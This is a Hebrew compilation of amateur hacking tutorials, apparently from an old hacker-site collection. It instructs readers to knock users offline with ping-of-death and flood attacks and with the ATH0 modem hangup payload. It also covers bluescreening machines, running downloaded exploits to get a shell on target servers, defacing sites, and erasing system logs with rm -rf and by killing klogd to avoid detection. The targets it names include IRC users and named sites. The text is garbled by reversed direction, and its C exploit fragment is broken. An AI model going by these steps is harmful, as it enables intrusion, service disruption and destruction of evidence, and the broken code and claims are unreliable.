Professional Documents
Culture Documents
זהו ספר של האקר זון -אני רק מביא לכם אותו לקריאה ולמידה
בלבד!
נושא :האקינג
פה אנחנו נראה את המדריכים אשר נוגעים לנושא האקינג,
למה ? (1
ראשונהath0 : שיטה (2
שנייהlame) ping o death) : שיטה (3
שלישיתport flood : שיטה (4
רביעית(paqwetting" (packetting" : שיטה (5
----------------------------------------------------
(1למה ?
---------
למה לעשות את זה ?
...ככה...אולי משעמם לכם לפעמים אז תעבירות את הזמן
בלהכנס לשרתי \ ערוצי מירק של ערבים ומתוך שעמום תתחילו
לנתק ערבים...
דוגרי אין לי ממש סיבה
----------------------------------------------------
ATH0 (2
--------
חיזבאללה !!! איפה איפה ?!
המממ....הסברתי לכם באיזה טקסט שלי איך לנתק עם זה
אנשים אז פה אני רק יזכיר לכם:
בווינדוס:
צריך להוריד \ להכין תוכנה ...אפשר למצוא 2כאלה
ב:
neworder.box.sk
פשוט תריצו שם חיפוש על
ATH0
ומשם תבינו לבד או שתקראו את אטקסט שלי
----------------------------------------------------
שיטה שנייה:
לעשות משהו כזה:
ping -t -l 99999 212.179.173.64
מה שהווינדוס לא יתן לכם לעשות בגלל זה צריך גרסה פרוצה של הפינגר
עם הצלחתם לבצע את זה ועבר טוב ...הקורבן יושב מול מסך כחול
כי הווינדוס מוגבל כמו ילד מפגר
-----------------------------------------------------
-----------------------------------------------------
packetting (5
--------------
לפקט....הממממ...אני רק ימצא דוגמא...שנייה...
אוקי
מה שהשיטה הזאת עושה זה שולחת המוווון פאקטים שכרגיל
גורמים לעומס על מערכת השליחה והקבלה מה שגורם לניתוק
הנה לוג קטן מהמירק:
-
]^jaxler PING reply]: 2secs
-
]^jaxler PING reply]: 12secs
-
!PING? PONG
-
]^jaxler PING reply]: 1min 8secs
-
]^jaxler PING reply]: 1min 45secs
-
1min 45secs
זה הכי גבוהה שהגעתי...כי פסקתי ,אבל קיצר מה שקורה
זה שזה חוסם את כל הכניסות והיציאות של האינטרנט וכדי להשתמש
בשיטה הזאת מומלץ בחום אינטרנט מהיר ! בעיקר בהעלה
עם הייתי ממשיך והייתי מגיע למאה שמונים שנייות הוא
היה מתנתק מהאינטרנט כי ה ispהיה חושב שהוא לא שם יותר כי הוא לא מגיב
ובמירק היה רשום משהו כמו:
^(jaxler quit (ping timeout 180 secs
בערך...
----------------------------------------------------
אקספלוייטים בחומרה
אקספלויטים בחומרה....
---------------------
(1מדפסות
(2מודמים
YES (3
(4קראק זמן של הכל
--------------------
(1מדפסות
-----------
יש מדפסות בעיקר של hpשפותחות פורט שאם אתה מתחבר אילו אז אתה יכול
להשתמש בו
להדפיס לקבוע סיסמא וכל מיני בולשיט ...זה פורט 500אני חושב
אבל יש עוד כמה נחמדים...כמו להוסיף ל autoexec.batשלכם את השורה
בהתחלה:
echo $#%#^%&#$%#$%^# >> LPT1
אתה ה 1אפשר לשנות ...זה ידפוק לכם את המדפסת כך שהווינדוס לא יזהה
מה זה
ואפשר גם להכנס למירק תחת השם הזה ועם מישהו עושה לך איגנור הוא או
יקרוס או
שהמדפסת לא תגיב עד הריסט הבה של שניהם
בלינוקס תעשו echo hi >> /dev/lpt1וזה יגרום לאותו דבר
(2מודמים
-----------
לכלום הסברתי את הבאג של ה ATH0+++נכון ?!
אז יש את זה וגם אפשר גם להוסיף משהו כזה ל autoexec.bat
ECHO GFHGFH >> com1
את האחד גם פה אפשר לשנות,
רוב הבאגים אותו דבר יש המון אפשרויות ...וגם את זה אפשר לעשות במירק
)ד"א(
ובלינוק נחמד לעשות
echo HI >> /dev/hda1
שזה ידפוק את ההארד דיסק ...מניסיון אישיויש המון מכשירים שמוגדרים
בדוס שאם תכתבו אותם זה יגרום למסך כחול הנה רשימה קצרה:
con/con
nul/nul
$clock$/clock
$config$/config
aux/aux
ועוד...
YES (3
-----------
רוצים בלה בלה בלה ?
!YES
רוצים עוד בלה בלה בלה ?
!YES
רוצים להאזין לתדרים דרך הלוין שלנו ?
!YES YES YES
...
זה משהו שאני מצאתי ובדקתי לפני שבועיים ואני מקווה שלא עלו על זה
תלחצו על הסמל של המעטפה בקצה למטה של השלט )נראה כמו סמל של אי מייל(
יעלה לכם קצת חרא ...תלכו עם החצים של ימינה ושמאלה
ל-לווין ושם תלחצו על בחירת לווין ...זה יבקש סיסמא ועם ההורים שלך לא
שינו קוד
אז זה 0000עם הם שינו תנסה את שנות הלידה של ההורים שלך ועם זה לא עובד
תנסה מה שחבר שלי ניסה
תעברו על הכל ..אחרי שעברתם על מה שהגיוני ....הוא התיאש ב 4670בערך
או קי עכשיו אתם רואים רשימה של לווינים נחמדים וחלקם באיכות יותר טובה
מהדיפולט
תחפשו שם:
user1
או
user2
user3
user4
)כולם אחד אחרי השני(
=====================================================================
========
hackerz-zone.com
=====================================================================
========
)(C
יש לי המון ד"א...
ד"א:
מי שיודע טוב לתכנת ב-
Denial of service
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DoS
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(1מה זה?
(2סוגים
ping(3
icmp(4
igmp(5
(6ראוטרים
(7פורטים
(8פיירואלל
(9חומרה
(10מירק
(11טיפ
========================================================
(1מה זה ?
----------
DoSזה קיצור של דינאיל אוף סרוויס יענו שגיאה בשירות
יש כל מיני סוגים שלהם אבל רובם \ כולם גורמים לאותו הדבר
...לקריסה של השירות או מערכת כדי שהמערכת לא תיהיה פעילה או
שחלק ממנה לא יפעל טוב או שהיא תתחיל את עצמה מחדש ובגלל זה
יחזרו למערכת כל הסיסמאות של הדיפולט
=========================================================
(2סוגים
---------
יש כל מיני סוגים ,אבל אלה הם הפגיעים ביותר:
חומרה ותוכנה.
כי הם פותחים פורטים ,ורובם שייכים למיקרוסופט
וחלק נמצאים במערכת הפעלה ואי אפשר להוריד אותם אבל אפשר לתקן
את הבאגים האלה
=========================================================
Ping (3
--------
יש שלוש בעיות בפינג ,אחד זה שרוב הפיירואללים לא מתיחסים אליהם
כי כל דבר באינטרנט מחזיר לך פינג או עושה לך פינג למשל:
שאתה נכנס לאתר הדפדפן שלך עושה לו פינג כדי לבדוק עם הוא קיים
ועוד כל מיני פרטים שוליים,
בעיה שנייה זה שעם עושים לך יותר מדי פינגים )שזה בהחלט ליים(
למשל למשך חמש דקות אז זה עלול לגרום למחשב שלך לקרוס או שזה
ינתק אותך מהאינטרנט כי המודם שלך מתאמץ אבל זה רק עם יש לך
K 56או פחות )חח( ולמי שעושה לך את זה יש משהו מהיר יותר כמו
adslאו עדיף isdnכי isdnמעלה יותר מהר מה אי די אס אל ) 128בערך(
הבעיה השלישית היא שהוינדוס תוכנת לקבל מקסימום 65500וזה לא נותן לך
לשלוח יותר
כדי שלא תעשה את זה לאנשים אחרים ב 98עשו אותו דבר אבל זה לא יכול לקבל
65510ביתים של פינג ,אז כדי לנצל את זה צריך לכתוב את זה בפרל או בסיי
או בכל שפה אחרת
ד"א מה שתצליח לשלוח עם הפינג הרגיל זה 65500וזה לא עוזר אלא עם יש לכם
חמש דקות פניות
)למרות שבזמן הזה הקורבן כבר ילך לישון יתנתק לבד(
עוד ד"א -עם מחשב אחר מקבל 65510הוא יקרוס ובמקרה של ווין 98או 95
הוא יעלה מסך כחול ומכוער
=========================================================
ICMP (4
--------
זה כמו פינג ,זה בעצם הפרוטוקול שמשמש פינג
=========================================================
IGMP (5
--------
זה גם כמו פינג רק שאי אפשר לשלוח אותו בגודל גדול מידי אפשר רק לנסות
להציף
אותו ,ורוב המחשבים מוגנים מזה ...בערך 99אחוז מוגנים ...אולי
windows 95לא מוגן אבל זהו
=========================================================
(6רואטרים
-----------
יש המון סוגים של ראוטרים אבל אני יתמקד ב ראוטרים של
כי זה הראוטר הכי נפוץ ובגלל זה יש לו המון באגיםCISCO
()כי אנשים בודקים אותו כל הזמן
אני יתן פה אקספלויט בסיי על אחד הבאגים הנפוצים שלו שגורמים לו לעשות
: הסיסמאת דיפולט שלו היא... ומחזיר את הסיסמא שלו לדיפולטRESET
או
CISCO
באותיות גדולות
או
Cisco
שזה רק האות הראשונה או
cisco
..שזה הכל קטן
:הנה האקספלויט
<include <stdio.h#
<include <string.h#
<include <netdb.h#
<include <netinet/in.h#
<include <sys/types.h#
<include <sys/socket.h#
<include <unistd.h#
;int x, s, i, p
char *str =
"45646545646465465465fsdfdsfdsfdsf46465454665465465456456465465456465
465465456464654654564564564564564564654654564654654654564654464656464
654456654unFunF454646465465465465465456456465456465456456465456456321
313132132123132123123132123132123132132132123132123123154654645646464
;"464
;struct sockaddr_in addr, spoofedaddr
;struct hostent *host
;([p = atoi(argv[2
;(open_sock(s,argv[1],p
=========================================================
(7פורטים
----------
מה שטוב בפורטים זה שהם חייבים להיות וכולם ניתנים לניצול
יש פורטים שקורסים אם הם מקבלים המון בולשיט או שהם מקבלים המון
פקודות ואז הם קורסים ויש גם את הבעיה שאם מתחברים אליהם יותר מידי
סוקטים הם או קורסים או שפשוט אף אחד לא יכול להתחבר אליהם וזה יכול
לגרום להמון בעיות
למשל אם מתקיפים את הפורט 139אז המשתמשים ברשת שלך לא יכולים לגשת לך
לקבצים ששיתפת
או שעם מתחברים ליותר מידים פורטים ראנדומלים )זה לא משנה עם זה tcpאו
(udp
הם לא יתנו לקורבן לעשות כלום באינטרנט אפילו לא לגלוש ולא לקבל פינגים
מה
ispשלהם מה שיגרום לזה שהם יתנתקו ) = ispספק אינטרנט( ,יש לי
אקספלויט בשביל זה ב
perlיענו pl.עם אתם רוצים אותו צרו קשר באי סי קיו שלי ואני יתן לכם
את הקוד
אבל מומלץ להשתמש בזה ממערכת הפעלה של xpאו windowz 2000
כי הם יכולים לפתוח המון סוקטים ...אפילו יותר מלינקס וכדי להריץ את זה
תצתרכו להוריד
- Active Perlחפשו בגוגל...
=====================================================================
================
Firewalls(8
------------
כדי לרסק פיירואלל אתם צריכים להתחבר להמון פורטים כמה שיותר מהר
וזה גם יהיה טוב עם תשתמשו בתוכנה שתעשה ספוף לאי פי שלך ככה שלא
לחסום את האי פי שלך וזה לא יחשוב עליך אפילו ,מה שיקרה זה שזה יקפוץ או
יעשה רעש או
יגיד לקורבן שמנסים להתחבר לפורט המסוים וישאל אותו עם לחסום וכו...
אבל עם זה יקרה מהר מדי על פורטים שונים זה יודיע על חיבורים מלאאאא
פעמים וזה יתקע את המחשב
והקורבן יאלץ לסגור את הפיירואלל ,וזה גם ימלא מקום בהארד דיסק בגלל
הלוג )זאת שיטה בדוקה(
תחשבו לבד איך לנצל את זה או שעוד פעם תפנו אליי ותקחו ממני את התוכנה
שלי שהכנתי לזה
=====================================================================
================
(9חומרה
---------
בחלק הזה של הטקסט שלי אני יתמקד במדפסות של HP
הם פותחים פורט תחת המספר 500ואפשר לגרום לו להדפיס מלא בולשיט עם
הפקודה
printאו משהו כזה ,הדבר הנחמד בזה זה שאפשר להציף את הפורט הזה בדאטא
הזה למשל:
print c:\autoexec.batואז גם הוא יפחד וגם יגמר לו הדיו ...ואולי עם
זה יהיה מספיק מהר
ידפק לו המדפסת וגם נחמד לעשות לו:
print /con/con.txt
שיגרום לו למסך כחול )עם זה 98או ))) 95הווינדוס(((( (
יש המון דברים אחרים כמווווו הממממ....לא עולה לי בראש אבל אני משער שיש
לכם רעיונות
=====================================================================
=================
(10מירק
במירק אפשר לשלוח ctcpעם תוכן אז אפשר לשלוח ctcpשמלא ב " " )רווחים(
וזה יגרום ללאג לקורבן)....סתם קצר ונחמד(
וגם אפשר לשים את השם שלך תחת com1 :
או 2
3
4
ועם עושים לך איגנור אז הם גם עושים לחומרה שלהם למשל המודם
שנמצא בקום הזה
=====================================================================
=================
(11טיפ
--------
יש משחקי טלוויזיה כמו הוגו הישן שמתפקדים לפי החצים שלך
יענו לפי הצלילים אז תנסו להקליט מלאאא צלילים כמו 6ו 4
יענו לזוז לצדדים ועם אתם מצליחים לעלות למשחק כזה תשמיעו אותם
וזה אמור לתקוע את זה )זה לא בדוק(
=====================================================================
==================
שלב
-------------------------------------------------------------------:1
-----------
להשיג פרטים על האתר שאנחנו רוצים לפרוץ כמו על איזה מערכת הוא רץ
מיספר
אי פי
רוחב הפס וכו וכו ,,,,אבל הכי חשוב זה לדעת איזה מערכת יש לו.
איך אנחנו עושים זאת?
יש הרבה שיטות כמו לקבל את ההודעות שגיאה מהאתר אבל השיטה הכי טובה זה
להיכנס לאתר
שמציע לבדוק את זה בשיבלך הנה אתר מצויין שעושה זאת.
www.netcraft.com
אז שמה תשים את האתר במנוע שלהם והוא יעשה לכם את העבודה.
*********************************************************************
*****************
שלב
-------------------------------------------------------------------:2
------------
אחרי שאתם יודעים איזה מערכת יש על השרת מה שאתם צריכים לעשות זה ללכת
לאתרים כמו:
www.astalavista.box.sk
http://hack.co.za
www.securityfocus.com
www.packetstormsecurity.org
ולהוריד משם את האקספלויט המתאים למערכת ,עכשיו אני יעצור רגע ויסביר מה
זה אקספלויט):כן קצת אנגלית אף פעם לא הזיקה זה הסבר מצוין תעשו כמובן
עכשיו קונטרל+שיפט לקריאה נכונה(
*********************************************************************
*********************************************************************
*********************************************************************
*************************************************
A exploit is a bug in a software, hardware, and/or OS that allows
attacks to get access there not supposed to, like root on a machine,
or just
.shell access
An exploit is a downloadable program (that usually has to be
,compiled
more on this in a bit), that takes advantage of the vunerablity
usually
giveing access to the computer or even worst, root (unless it's a
.(windows server then I guess it would be admin
.There are three types of exploits, local, remote, and DDOS
!!!Anyway
אקספלויט יבוא ברוב המיקרים כקוד מקור )לא מחייב( אז לפני שאנחנו מריצים
אותם אנחנו צריכים לקמפיל אותם )אני יסביר יותר מאוחר איך עושים זאת(
כמעט כול האקספלויטים ירוצו תחת מערכת של יוניקס או לינוקס.
ז"א שאנחנו צריכים ליפתוח חשבון שאלל בשביל שנוכל להריץ אקספלויטים.
)אפשר
גם דרך קימפול רגיל עים כול מהדר של סי או פרל(
הסבר למי שלא יודע מה זה חשבון שאלל עים אתם יודעים תעברו הלאה אני
ממליץ
לקרוא:
*********************************************************************
*********************************************************************
*************************************************
)את ההסבר הבא בחלקו לקחתי מבלוד ראנר מנהלת גהנום אחלה של אתר(
בעיקרון ) shell accountאו "שאלל" בעברית המעוותת של ימינו(
היא דימוי של מערכת יוניקס,כלומר אתה יכול להריץ פקודות של יוניקס
ומכיון
שרוב האקספלויטים פועלים תחת מערכת זאת
אנחנו צריכים ליפתוח לנו חשבון )תאמינו לי קשה למצוא אתרים שיתנו לך אבל
אני מצאתי( (:
www.hobbiton.org
www.arbornet.org
!!!Anyway
תחזור לטלנט לחשבון שאלל שלך שלך ותילחץ שם )קונטרול+שיפט לקריאה נכונה
של
האנגלית(
**/vi is a text editor/
<vi <exploit name> <press enter
כעיקרון אתה יכול לפתוח את זה בכול שם שאתה רוצה אבל תשים לב שבסוף יהיה
הסיומת של הסוג
של האקספלויט עים זה למשל האקספלויט תוכנן בפרל אז הסיומת תהיה:
blabla.pl
ובשפת סי זה יהיה:
blabla.c
!!!Anyway
ה viזה טקסט אדיטור שפועל תחת מערכת לינוקס ,טוב אחרי שנכנסו אליו
תקישו
iזה יכניס אותנו למצב של אינסרט שיהיה אפשר
להכניס לתוכו את מה שסימנו מקודם.
עכשיו לכו בטלנט לאדיט ותילחצו פסט)הדבק(
edit>past
עכשיו האקספלויט מועתק מתי שזה גומר תילחצו )) (ESCהמקש מיצד שמאל
למעלה(
זה יפנה אותך למצב שאתה יכול להקיש פקודות עכשיו תילחץ שיפט+נקודתים
ותיצור :
עכשיו בתחתית המסך יופיע
:עם סמן לידו עכשיו תילחץ wqזה יצא מהעורך והקובץ ישמר.
אתה יכול לבדוק עים זה נוצר עים הפקודה . ls
טוב עכשיו יש לנו אקספלויט שמוכן להרצה .
*********************************************************************
********************
אבל איך משתמשים איתו? ואיך להפעיל אותו ועוד הרבה סימני שאלה
>>>>>???????????>>?????????<<<<<>>>>??????<
שלב
--------------------------------------------------------------------4
----------------
*********************************************************************
****************
טוב עכשיו תקישו בתיבת הפקודה)תעשו קונטרל+שיפט כול פעם שיש אנגלית יותר
אני לא יזכיר(!!!!!!!!!!)ככה תפעילו אקספלויט שתוכנן בפרל(
פקודה מיספר 1
לא חשווב כרגע מה היא עושה זה קשור להרשאות אבל תקישו את הפקודה הזאת
בספרייה של האקספלויט.
פקודה שנייה
הפיל זה השם של האקספלויט <file>/
מהפקודה הזאת אתה תקבל פלט שמסביר לכה איך להישתמש באקספלויט אתם כנראה
תקבלו פלט כזה:
<Usage: <filename><host><command
and then it will exit.What this is telling you is how to use the
exploit, it's telling you to type in the
filename followed by the host (anysite) and
the command (the command
(you want executed
לא תמידזה יציג את הפלט הזה ומי שמבין מומלץ לו לעבור בכלל על קוד/*
המקור
*/וליראות איך מפעילים ומה הוא עושה
(אז בוא נגיד שאני רוצה לפתוח חשבון שאלל )על האתר שאני רוצה לפרוץ
( )זה יוצר שאללbin/sh/ אז הפקודה עומדת להיות
(טוב מה קורה פה למי שלא הבין באנגלית אנחנו מקיפלים אותו)את האקספלויט
.ויוצרים אותו כקובץ חדש שיהיה אותו שם רק בלי הסיומת
עכשיו חוץ מהקטע הזה הכול דומה לחלק הראשון אז אני ישים את זה באנגלית
את
: ההסבר
*********************************************************************
*******************************************************************
<type ./<filename> <enter .2
again where file is the actual .pl exploit,
this actually runs the
file, this usally gives you a format of
what the file is looking for, for instance you
get an output
:similiar to this
<Usage:<filename> <host> <command
And then it will exit. What this is telling
you is how to use the
exploit, it's telling you to type in the
filename followed by the host (yoursite) and
the command (the
command you want executed), so
let's just give you a shell account on your
machine, so the command
will be /bin/sh (this executes
(a shell
<type ./<filename> <host> <command .3
it will be ./filename www.hizbulla.net ,
/bin/sh <enter>. Now the
thing means the /.
current directory, don't worry about this
unless you know Unix or
Linux, but you need this to
.execute the exploit
*********************************************************************
*******************************************************************
.טוב עכשיו אתם יודעים איך מריצים אקספלויטים
:הערות
בשביל להריץ את האקספלויט אתם יכולים גם לעשות זאת דרך מהדר רגיל שלי.1
סי
.או פרל
ותעתיקו את הקובץcp אתם יכולים להריץ עוד פקודות חוץ מיצירת שאלל כמו.2
.של הסיסמא
החלק הקשה הוא במציאת האקספלויט המתאים אתם צריכים לחפש כמה שיותר.2
!!!חדש
. אקספלויטים עד שתפרצו10 יכולים לקחת לכם כ.3
.זה שווה את המאמץ.4
בפעם הבאה אני ילמד שיטה נוספת לפרוץ לאתר מקווה שלמדתם משהו שלא
!!!!!!!ידעתם
have some fun
******************************************אקספלוי
(C)***********************************ט
(part 2 from 3)
!!!!!!!!!!!!Break into site, The Cracker Way: by MiDL
""the young man struggles on he's known
**********************************************************
#OpleMidl לא הבנתם משהו,לא הצליח לכם,רוצים לדבר איתי ,כנסו לערוץ
במירק בשרת של (dalnet(irc.dal.net)(6667
!!!!!!!your all invite
*********************************************************************
******************
טוב יכול להיות שאני יטעה אז עים תשימו לב למשהו תרגישו חופשיים לצור
איתי
*** קשר כנסו
לערוץ שלי בדלנט אני נימצא שם הרבה ביחוד בין 9ל 11
*** בלילה!......................
*********************************************************************
******************
הכתבה הזאת היא המשך לרישונה בשביל להבין אותה תיצתרכו ליקרוא את הכתבה
הקודמת על הסקריפט קידיס.
טוב בוא ניראה איך קרקר יפרוץ אתר שהוא רוצה ליפרוץ דבר ראשון הוא ישיג
את
הפרטים על האתר שהוא רוצה לפרוץ כמו על איזה מערכת הוא רץ מיספר אי פי
כמובן זה בסיסי בהתחלת כול פריצה בכול דרך אפשרית נזכיר לכם שאפשר ללכת
לכול מיני אתרים שיעשו את זה מצויין כמו:
www.netcraft.com
עכשיו הוא יעשה פורט סקאן על האתר בשביל לבדוק איזה תוכנות רצות עליו
ואיזה פורטים פתוחים
*/תוכל להשיג פורט סקננאר באתרים שונים פורט סקאן טוב זה פורט שלא רק
יראה
לך איזה פורט פתוח הוא גם יראה לך
port scannerטובים באתרים איזה תוכנה מישתמשת בפורט הזה תוכל להשיג
כמו www.hackres.com,www.hackersclub.com
*/
הפורט סקאנר שאני מיתשמש איתו קוראים לו portscanוזה רץ תחת וינדוס
בלינוקס אני מישתמש ב nmap
עים הפורט סקאנר שלך לא אומר לך איזה תוכנה רצה ומה הגירסא שלה פשוט
טטלנט
אל הפורט נגיד שאני רוצה לדעת
25 איזה גירסא של סאנד מיל מישתמש האתר של החיזבללה אז אני יעשה ככה
telnet hizbulla.netאני לא בטוח שיש כזה אתר
אבל הבנתם את הכוונה אני מקווה.
עכשיו מתי שאתה יודע איזה תוכנות רצות על האתר את הפורט של כול אחד ואת
הגירסא אנחנו מתחילים לחפש אקספלויטים
לכול תוכנה ותוכנה שרצה על השרת */שימו לב להבדל בין הדרכים של הקרקר
לסקריפט קידיס שבשיטה של הסקריפט הוא מחפש רק למערכת הפעלה לעומת הקרקר
שמחפש
לכול תוכנה שרצה על השרת וזה מגדיל את הסיכויים שלו ליפרוץ בהרבה*/
עכשיו אנחנו נחפש את כול הדברים שאנחנו יכולים למצוא על התוכנות שרצות
על המערכת על הגירסאות על פורטים על הכול..משהו שיתן לנו גישה כרווט
נריץ
אותו ונקבל גישה:
אחרי שהקרקר ישיג גישה כרווט הוא יחפש את קובץ האינדקס ככה
find index.html
זה יתן לו את המיקום של איפה הקובץ הזה נימצא בדרך כלל הוא נימצא בה
home/httpd/html/אז הוא יכנס לתקייה הזאת /cd home/httpd/html
עכשיו הוא יקיש lsוישים לב שהקובץ נימצא שמה */לקרקרים יש להם כמין
מינהג לא למחוק את הקובץ אינדקס הם ישנו אותו למשהו אחר )לכו תבינו(*/
ככה:
mv index.html home.html
עכשיו הם יצרו אחד משלהם ככה:
vi index.html
עכשיו פתחנו את העורך ויצרנו קובץ שקוראים לו כך index.htmlתכינו את
הקוד
htmlעל המחשב שלכם ורק תעתיקו אותו לתוך הקובץ שאתם יוצרים כך:
מתי שאתם בתוך העורך תילחצו iזה יביא אותנו למצב שאפשר להדביק עכשיו
תעתיקו את הקוד שלכם לתוך העורך אחרי שזה גמר
תילחצו על escואז תגיעו למצב שאפשר לתת פקודות אתם תילחצו שם wq:זה
ישמור ויצא.
עכשיו פרצנו לאתר בלי לגרום הרבה נזק אבל בוא נידאג שלא יתפסו אותנו.
שלב ראשון אנחנו ניבדוק עים יש לוגים של האתר הזה שנישמרים גם על שרתים
אחרים חוץ מזה,אנחנו ניבדוק את זה כך:
cat /etc/syslog.conf
הפקודה הזאת מציגה תוכן של קבצים אז הפעלנו אותה על הקובץ
syslog.conf
שבו זה מראה איפה עוד נישמרים לוגים אז אם ניראה שם שורה שלא מתחילה ב #
וכתוב שם איפי אז נפרוץ גם לאיפי שכתוב שם
ונימחק מישם גם את הלוגים.
אוקי עכשיו אנחנו עומדים לימחוק את כול הלוגים שנימצאים על השרת אנחנו
עושים את זה כך/*:איפה שרשום אנטר זה אומר שתירשמו את הפקודה ואחרי זה
תילחצו
אנטר כמובן*/
shift+cntrlלקריאה נכונה
<cd / <enter
<rm -rf /tmp/log <enter
<rm -rf /usr/log <enter
<rm -rf /var/log <enter
<rm -rf /var/logs <enter
<rm -rf /etc/log <enter
<rm -rf /usr/adm/log <enter
<rm -rf /usr/adm/syslog <enter
<rm -rf /tmp/var/log <enter
rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
<<enter
rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
<<enter
rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
<<enter
rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
<<enter
<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp <enter
<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx <enter
<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp <enter
<rm -rf /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx <enter
<rm -rf .bash_history <enter
<ln -s /dev/null .bash_history <enter
<killall -HUP inetd <enter
<unset HISTFILE <enter
<killall -9 klogd <enter
war war war war war war war awr war war awr awr awr awr awr awr awr
awr
awr awr awr awr awr war ar a war awr war awr
שליטה במודם
------------------------
ATH0 bug by spy[D]ir+++
------------------------
.1מה זה ?
.2איך לנצל ?
------------------------
? ma zeee.1
------------
זה באג שפועל על כל מודם )בערך 90אחוז( שלא קשורים בכבלים אי די אס אל
וכו...רק רגילים בקיצר
מה שזה עושה זה גורם למודם לנתק את עצמו...אפשר לגרום לו לעשות דברים
מגניבים גם אחרי הניתוק למשל עם הפקודה
ATH0,,,D155+++
זה יגרום למודם לנתק את עצמו ,לחכות ואז לחייג ל 155
(:
מה שעולה קצת כסף וגם מעצבן אם גורמים לו להתקשר למשטרה....בחו"ל(:....
How To Exploit.2
-----------------
מלינוקס זה פשוט מאוד....מווידוס אתם פשוט משתמשים בתוכנה שלי
מלינוקס....
פותחים חלון
console,bash
וכותבים
ping -c 5 -p 2b2b2b415448300d ip
זה ינתק אותו...
כל הזיבול שכתוב למעלה זה
ATH0+++
בהקס
ובוויןדוס תשתמשו בתוכנה במצורפת...
2B2B2B415448302C2C2C4454313434
מתקשר ל 144
2B2B2B415448302C2C2C4454313030
מתקשר למשטרה
2B2B2B415448302C2C5A6E
עושה ריסט למודם
איך לפרוץ למיין פריים
טקסט קצר עלידי ספידיר...מה שגם סיבך אותי בצרות....
===========
איך לפרוץ למייןפריים
===========
(1בסיס
(2הבעיה
(3הפתרון
.1מה זה מיין-פריים ?
-----------
מיין פריים זה מחשב שהוא שרת שמאכסן מידע לרוב בארגונים גדולים
חברות ממשלה וכו ...הם מאכסנים מידע ורק משתמש אחד )רוב הפעמים( יכול
להכנס ולשנות \ לצפות במידע הזה ,למשתמש קוראים סופר יוסר ואני לא
מתכוון כמו של מחשב נייד...
על המחשב יש מידע על הסופריוסר כולל טלפון למחשב שלו.
)(superuser
.2הבעיה
--------
שאתה מתקשר למיין פריים דרך המחשב עם תוכנת היפר טרמינל )זה בא עם
הווידוז( אתה מקבל משהו כזה:
--------------------------
Welcome to the mainfream
:user
--------------------------
זהו בלי ססמא ...אתה מקיש לך סופריוסר...מייד המיין פריים ינתק ואז
יבדוק את הפרטים של הסופר יוסר ,יתקשר לו למחשב והסופר יוסר מחובר....
אבל אתם צריכים שזה יתקשר אליכם כדי שתוכלו לשלוט בו ובמידע שבו
.3פתרון
--------
זה קל...
אתם מתקשרים למיין פריים דרך היפר טרמינל )תדאגו שיש גם טלפון רגיל
לידכם(
מקישים סופריוסר המחשב מייןפריים ינתק אבל אתם לא!
מייד שזה מנתק )או שנייה ממש לפני( תרימו את הטלפון יתשמיעו צליל ארוך
של קו )צריך להקליט ולהשמיע באיכות דיגיטאלית(
המיין פריים יחשוב שיש קו וכאילו ינסה לחייג לסופר יוסר למחשב ...אחרי
שהוא מפסיק לחייג אתם אומרים להיפר טרמינל אצלכם להרים את הקו ולחכות
לשיחה נכנסת ומייד אתם סוגרים את הטלפון שאתם מחזיקים ביד....
ויהיה בינך לבין המיין פריים קשר ותוכל לשלוט בו בטור סופריוסר
)(hahaha
אני לא ממליץ )גם מסיבה אישית( לעשות כל דבר כזה ובלה בלה בלה קפצו לי
and have a nice day
.spy[D]ir
==================================EOF
מבחו הארי מרפי חלק א'
איך לעבור את מבחן ההאקינג של הארי מרפי!?!?
--------------------------------------------
במדריך זה אני יסביר לכם איך לעבור את מבחן הארי מרפי משלבים 1עד 4
ובחלק השני אני יסביר את השאר!
השלב הראשון:
מיקוםhttp://homepage.eircom.net/~level12/11.html :
שלב קל מאוד כל מה שצריך לעשות זה לבדוק בקוד ...אבל זה לא כל כך
פשוט ...אוי ואבוי חסמו את הכפתור הימני אז הולכים ל VIEWל SOURCE
ורואים שם שהדף הראשי הוא HACK1.HTMLאז כותבים את הכתובת ורק משנים את
שם הדף! עכשיו תנסו לעשות כפתור ימני??? לא! עדיין אי אפשר! תכנסו שוב
ל VIEWשוב ל SOURCEוהנה ה SOURCEלפניכם...
חפשו שם את המקום שהוא משווה את מה שרשמתם לסיסמא האמיתית במקרה זה
בפונקציה הזאת:
ליישר לימין ואני לא יגיד את זה כל הזמן אז כל פעם שיש קוד תיישרו לימין
;'location='hack12.html
{ } else
שלב שני:
מיקוםhttp://homepage.eircom.net/~level12/yep123.html :
טוב ...כאן זה לא מסובך אבל זה דורש הברקה ..לא מחשבה אבל הברקה...
כל מה שצריך לעשות זה להסתכל בקוד ולראות שהסיסמא משתנה באופן רנדומלי
ונוצרת רק מחדש כל פעם שאתה נכנס לאתר...
אז נלך לקוד ונראה שהוא משווה את הסיסמא למשתנה ליתר דיוק למשתנה DE4
(if (document.isnform.cmb.value != de4
נלך לשורת הכתובת ונכתוב:
(javascript:alert(de4
והופ ...הנה הסיסמא קופצת לנו! (:
הערה :בחלק מהדפדפנים יעלה חלון שגיאה כאשר תעשו את השורה שזאת .לאלו
שזה קורה יש ללחוץ לחיצה ימנית על החלון ולבחור את האפשרות
open frame in new window
ואז שוב לכתוב את השורה
שלב שלישי:
מיקוםhttp://homepage.eircom.net/~level12/hk177.html :
השלב השלישי הוא הכי קל!
מה שאתם צריכים לעשות זה לקחת את שם המשתמש והסיסמא המוצפנת ולכתוב אותם
בקובץ ככה:
a101:Or5hCcebRcTV2
שם המשתמש הוא a101והסיסמא מוצפנת...
קחו קראקר )לא לא קרקר זה לא הפסקה יש עוד המון עבודה (:ותכוונו אותו
על פריצת הסיסמא...
אם תרצו שאני יחסוך לכם את העבודה אז הסיסמא היא ROOTאז לא צריך לחכות
הרבה שהקראקר יגמור כי בדרך כלל ROOTזה אחד הניסיונות הראשונים!
זהו רק תכתבו בשם המשתמש a101ובסיסמא ...ROOT
